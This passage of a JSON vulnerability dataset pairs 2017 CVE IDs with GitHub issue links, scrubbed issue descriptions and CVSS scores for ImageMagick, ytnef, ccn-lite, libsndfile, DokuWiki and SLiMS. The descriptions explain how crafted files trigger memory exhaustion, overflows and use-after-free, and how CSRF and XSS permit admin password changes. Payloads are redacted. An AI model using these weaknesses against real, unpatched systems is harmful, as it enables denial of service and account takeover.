        "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify DCM file , imagemagick will allocate memory to store the data. Here is the critical code: ERRORTAG length can be controlled as follow: ERRORTAG datum is int which is NUMBERTAG bit and signed type, quantum is size_t which is NUMBERTAG bit and unsigned type. datum is from file data, it is can be controlled, so can set datum value NUMBERTAG quantum value is a constant as it just can be PATHTAG So if datum is a negative number, it will be convert to a unsigned NUMBERTAG bit which is very large. So length can be controlled as very large to cause memory exhaustion . testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12141",
        "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/50",
        "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/50",
        "Repo_new": "yeraze/ytnef",
        "Issue_Created_At": "2017-06-08T14:15:18Z",
        "description": "heap buffer overflow in APITAG APITAG ). On Yerase TNEF Printer NUMBERTAG a heap buffer overflow was found in the function APITAG APITAG ). CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-12142",
        "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/49",
        "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/49",
        "Repo_new": "yeraze/ytnef",
        "Issue_Created_At": "2017-06-08T14:13:52Z",
        "description": "invalid memory read in APITAG On Yerase TNEF Printer NUMBERTAG an invalid memory read was found in the function APITAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-12144",
        "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/51",
        "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/51",
        "Repo_new": "yeraze/ytnef",
        "Issue_Created_At": "2017-06-08T14:16:49Z",
        "description": "allocation failed in APITAG On Yerase TNEF Printer NUMBERTAG a allocation failed was found in the function APITAG APITAG ). ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-12412",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/128",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/128",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2017-08-03T11:59:26Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-12418",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/643",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/643",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-02T12:50:16Z",
        "description": "Memory leak in APITAG APITAG Link : FILETAG Trigger Command : ./magick convert Memory Leak NUMBERTAG output_fp NUMBERTAG output.fpx Detail: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12425",
        "Issue_Url_old": "https://github.com/varnishcache/varnish-cache/issues/2379",
        "Issue_Url_new": "https://github.com/varnishcache/varnish-cache/issues/2379",
        "Repo_new": "varnishcache/varnish-cache",
        "Issue_Created_At": "2017-07-31T08:10:57Z",
        "description": "Placeholder issue please do not touch.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12427",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/636",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/636",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-31T12:54:49Z",
        "description": "Memory leaks in APITAG poc_link: FILETAG Trigger Command\uff1a APITAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12428",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/544",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/544",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-06T05:33:05Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The function\u00a0 APITAG in draw.c allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase\uff1a URLTAG APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12429",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/545",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/545",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-06T08:25:31Z",
        "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify MIFF file , imagemagick will allocate memory to store the data, here is the critical code: APITAG , in function APITAG ERRORTAG The \"colors\" can be obtained from local value \"options\" as follow, and the options is controlled by image , in other words the \u201ccolors\" can be read from input file. ERRORTAG The function APITAG convert string to unsigned long type, but the return value was not checked. Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12430",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/546",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/546",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-06T08:47:57Z",
        "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify MPC file , imagemagick will allocate memory to store the data, here is the critical code: APITAG , in function APITAG APITAG The \u201cimage >colors\" can be obtained from local value \u201coptions\u201d as follow, and the options is controlled by image , in other words the \u201cimage >colors\" can be read from input file. ERRORTAG The function APITAG convert string to unsigned long type, but the return value was not checked. Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12431",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/555",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/555",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-09T10:38:14Z",
        "description": "use after free in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify WMF file , a crafted file revealed a use after free vulnerability. A piece of memory was allocated in in function APITAG APITAG Free:(api.c, in function wmf_lite_destory ) APITAG Use after free: (wmf.c, in function APITAG APITAG testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12432",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/536",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/536",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-04T14:29:43Z",
        "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE When identify PCX file , imagemagick will allocate memory to store the data. Here is the critical code: APITAG pcx_packets can be controlled as follow: APITAG APITAG can be read from input file ERRORTAG Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Creadit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12433",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/548",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/548",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-07T08:25:15Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The function APITAG in memory.c allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12434",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/547",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/547",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-06T11:50:17Z",
        "description": "assertion failed in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in image.c. CODETAG testcase \uff1a URLTAG Credit \uff1a APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12435",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/543",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/543",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-05T16:49:29Z",
        "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE When identify SUN file , imagemagick will allocate memory to store the data, here is the critical code: sun.c , in function APITAG ERRORTAG colormap.c , in function APITAG APITAG memory.c in function APITAG size_t count,const size_t quantum): APITAG APITAG is the same to malloc. image >colors can be controlled by struct APITAG value \"sun_info\", and sun_info is read from APITAG as follow, in other words image >colors can be read from input file. CODETAG Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12463",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/129",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/129",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2017-08-07T18:01:55Z",
        "description": "[ CVETAG ] ccnl APITAG Memory Leak. struct envelope_s env leaks memory, if packet format is unknown.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12464",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/130",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/130",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2017-08-07T18:03:51Z",
        "description": "[ CVETAG ] A NULL pointer deref in ccn lite valid.c. A NULL pointer deref in ccn lite valid.c keys = load_keys_from_file(keyfile); keyfile might be NULL, when not specified on the cmdline",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12465",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/131",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/131",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2017-08-07T18:08:47Z",
        "description": "APITAG CVETAG ] iottlv_parse_sequence and localrpc_parse: integer overflow. int localrpc_parse(int lev, unsigned char base, unsigned char buf, int len, int rawxml, FILE out) { int typ, vallen, i; unsigned char cp; the typ, vallen and i want to be unsigned as well, otherwise the APITAG in the LRPC_FLATNAME will run amok APITAG iottlv_parse_sequence(int lev, unsigned char ctx, unsigned char base, unsigned char buf, int len, char cur_tag, int rawxml, FILE out) { int i, vallen; vallen wants to be unsigned, better size_t ...",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12466",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/132",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/132",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2017-08-07T18:21:29Z",
        "description": "[ CVETAG ] ssl_halen is NUMBERTAG for me, when running ccn lite simu which causes an out of bounds NUMBERTAG b NUMBERTAG in ll2ascii PATHTAG NUMBERTAG b NUMBERTAG in ccnl_addr2ascii PATHTAG NUMBERTAG bce NUMBERTAG in ccnl_get_face_or_create PATHTAG NUMBERTAG f NUMBERTAG in ccnl_simu_add_fwd PATHTAG NUMBERTAG f2fc8 in ccnl_simu_init PATHTAG NUMBERTAG dfa in ccnl_simu_init PATHTAG NUMBERTAG dfa in main PATHTAG NUMBERTAG f6d NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG a NUMBERTAG PATHTAG )",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12467",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/133",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/133",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2017-08-07T18:24:06Z",
        "description": "[ CVETAG ] memory leak. p >comp = (unsigned char ) APITAG sizeof(unsigned char )); p >complen = (int ) APITAG sizeof(int)); if (!p >comp || !p >complen) return NULL; when one of the allocations fails, the memory for the other variable leaks",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12468",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/134",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/134",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2017-08-07T18:30:38Z",
        "description": "[ CVETAG ] ccn lite ccnb2xml.c: Buffer Overflow. oid print_blob(unsigned char buf, int len, int typ, int num, int offset, bool APITAG { int vallen; unsigned char valptr; if APITAG print_tag(offset, typ, num, true, false); ccnl_ccnb_consume(typ, num, buf, len, &valptr, &vallen); if (vallen > len) { return; } vallen > len is not checked",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12469",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/135",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/135",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2017-08-07T18:33:21Z",
        "description": "[ CVETAG ] util/ccnl common.c: write in unallocated memory. util/ccnl common.c: if (key && keylen NUMBERTAG struct key_s k = (struct key_s ) calloc NUMBERTAG sizeof(struct key_s )); the APITAG only allocates the size for a pointer, not for the entire struct, causing writes to unallocated memory",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12470",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/136",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/136",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2017-08-07T18:36:20Z",
        "description": "[ CVETAG ] ndn_parse_sequence: integer overflow. static int ndn_parse_sequence(int lev, unsigned char base, unsigned char buf, int len, char cur_tag, int rawxml, FILE out) { int i, maxi, vallen; int typ; typ should be unsigned, otherwise the check below fails: if (typ < NDN_TLV_MAX_TYPE && ndntlv_recurse[typ]) { len = vallen; vallen wants to be unsigned as well, or better size_t",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12471",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/137",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/137",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2017-08-07T18:41:36Z",
        "description": "[ CVETAG ] ccn lite pktdump. APITAG does not check for out of bounds conditions, causing an invalid read in APITAG while APITAG base, buf, len, &num, &typ, rawxml, out NUMBERTAG if (num > len) return NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12472",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/138",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/138",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2017-08-07T18:43:58Z",
        "description": "[ CVETAG ] ccnl ext mgmt.c Missing NULL pointer checks after APITAG which is defined to a libc APITAG Missing NULL pointer checks after APITAG which is defined to a libc APITAG src/ccnl ext mgmt.c: interfaceaddr = (char )ccnl_malloc(num_interfaces sizeof(char )); src/ccnl ext mgmt.c for(it NUMBERTAG it APITAG complen = (int ) ccnl_malloc(sizeof(int NUMBERTAG src/ccnl ext mgmt.c prefix_a >complen NUMBERTAG strlen(\"mgmt\"); src/ccnl ext mgmt.c: prefix_a >comp = (unsigned char ) ccnl_malloc(sizeof(unsigned char NUMBERTAG src/ccnl ext mgmt.c prefix_a >comp NUMBERTAG unsigned char )\"mgmt\"; src/ccnl ext nfnops.c: h = ccnl_malloc(sizeof(int)); src/ccnl ext nfnops.c h = i2 i1; src/ccnl ext nfnops.c: cp = APITAG src/ccnl ext nfnops.c strcpy(cp, pending); src/ccnl ext nfnkrivine.c: resolveterm = APITAG src/ccnl ext nfnkrivine.c sprintf(resolveterm, \"RESOLVENAME(%s)\", lambda_expr); src/ccnl ext nfnkrivine.c: int integer = ccnl_malloc(sizeof(int)); src/ccnl ext nfnkrivine.c integer = strtol((char )c >pkt >content NUMBERTAG src/ccnl core util.c: prefix >chunknum = (int ) ccnl_malloc(sizeof(int)); src/ccnl core util.c prefix >chunknum = chunknum; src/ccnl uapi.c: name = (char ) ccnl_malloc (sizeof(char) (strlen(d_obj >name NUMBERTAG src/ccnl uapi.c strncpy (name, d_obj >name, (strlen(d_obj >name NUMBERTAG because APITAG modifies the first arg ...etc, these are just _some_ examples",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12473",
        "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/139",
        "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/139",
        "Repo_new": "cn-uofbasel/ccn-lite",
        "Issue_Created_At": "2017-08-07T18:45:07Z",
        "description": "APITAG CVETAG ]: ccnl_ccntlv_bytes2pkt program crash. ccnl_ccntlv_bytes2pkt: this parsing is not safe for all input data needs more bound checks, as some packets with wrong L values can bring this to crash line NUMBERTAG and NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12562",
        "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/292",
        "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/292",
        "Repo_new": "libsndfile/libsndfile",
        "Issue_Created_At": "2017-06-14T10:23:06Z",
        "description": "Heap buffer overflows in APITAG in NUMBERTAG and later NUMBERTAG Case APITAG only enlarges the buffer by APITAG bytes instead of size bytes. This issue had originally reported by funute against openmpt NUMBERTAG see CVETAG ). openmpt NUMBERTAG uses libsndfile to write WAV files and can output large amounts of string data in the APITAG metadata field. Valgrind stacktrace (libsndfile NUMBERTAG ERRORTAG Test case in bug1.c (tested on Ubuntu NUMBERTAG with libsndfile NUMBERTAG ERRORTAG ERRORTAG NUMBERTAG APITAG in APITAG enlarges the header buffer (if needed) prior to the big switch statement by an amount NUMBERTAG bytes) which is enough for all cases where only a single value gets added. Cases APITAG , APITAG , APITAG however additionally write an arbitrary length block of data and again enlarge the buffer to the required amount. However, the required space calculation does not take into account the size of the length field which gets output before the data. Test case bug2.c (tested on Ubuntu NUMBERTAG with libsndfile NUMBERTAG with APITAG replaced by size in the buffer size calculation): ERRORTAG ERRORTAG NUMBERTAG Buffer size requirement calculation in case APITAG does not account for the padding byte ( APITAG happens after the calculation which uses size NUMBERTAG Case APITAG can overrun the header buffer by NUMBERTAG byte when no padding is involved ( APITAG while the buffer is only guaranteed to have size space available NUMBERTAG APITAG in case APITAG always writes NUMBERTAG byte beyond the space which is guaranteed to be allocated in the header buffer NUMBERTAG Case APITAG can overrun the provided source string by NUMBERTAG byte if padding is envolved ( APITAG where size is APITAG (which includes the NUMBERTAG terminator, plus optionally another APITAG which is padding and not guaranteed to be readable via the source string pointer). I have not yet invested the time to provide reproducable tests for NUMBERTAG to NUMBERTAG require hitting the header buffer end exactly which might not even be possible with NUMBERTAG byte alignment and the buffer enlargment being also NUMBERTAG byte aligned (I did not investigate this further, triggering might require an odd APITAG constant and/or a growing factor other than APITAG ). I would consider the current code to at least be fragile nonetheless NUMBERTAG is difficult to even catch with valgrind or similar tools because the source strings are layed out in one big buffer contiguously ( APITAG ) which makes it impossible for memory checkers to detect buffer overruns inside that buffer. Pull request with fixes will follow.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12563",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/599",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/599",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-23T13:57:14Z",
        "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify PSD file , imagemagick will allocate memory to store the data, here is the critical code: psd.c , in function APITAG ERRORTAG length can be read from image,that is to say it can be controlled by input file. APITAG Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12564",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/601",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/601",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-23T14:01:17Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase : FILETAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12565",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/602",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/602",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-23T14:03:16Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase : FILETAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12566",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/603",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/603",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-23T14:04:38Z",
        "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase : FILETAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12583",
        "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2061",
        "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2061",
        "Repo_new": "dokuwiki/dokuwiki",
        "Issue_Created_At": "2017-08-01T04:15:21Z",
        "description": "APITAG Refected XSS in FILETAG . Bug Field at is not sanitized in msg error message. It's a reflected XSS. Detail APITAG ERRORTAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12584",
        "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/49",
        "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/49",
        "Repo_new": "slims/slims8_akasia",
        "Issue_Created_At": "2017-05-26T12:26:07Z",
        "description": "Security Bugs] CSRF + XSS in Change User Profile. In Change User Profile function, there is no Old password to confirm change user password, and also no CSRF Token to protect CSRF malicious request. APITAG Owasp URLTAG . So when the admin user access to malicious web, it will trigger to automatically change admin password to attacker's password. Example request: URLTAG CODETAG This will change admin password to trichimtrich And also, there is a stored XSS in here too. All the field APITAG , APITAG , APITAG have the same problem. Sample request: APITAG APITAG APITAG APITAG Attacker can trigger admin to execute abitrary javascript to do anything.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
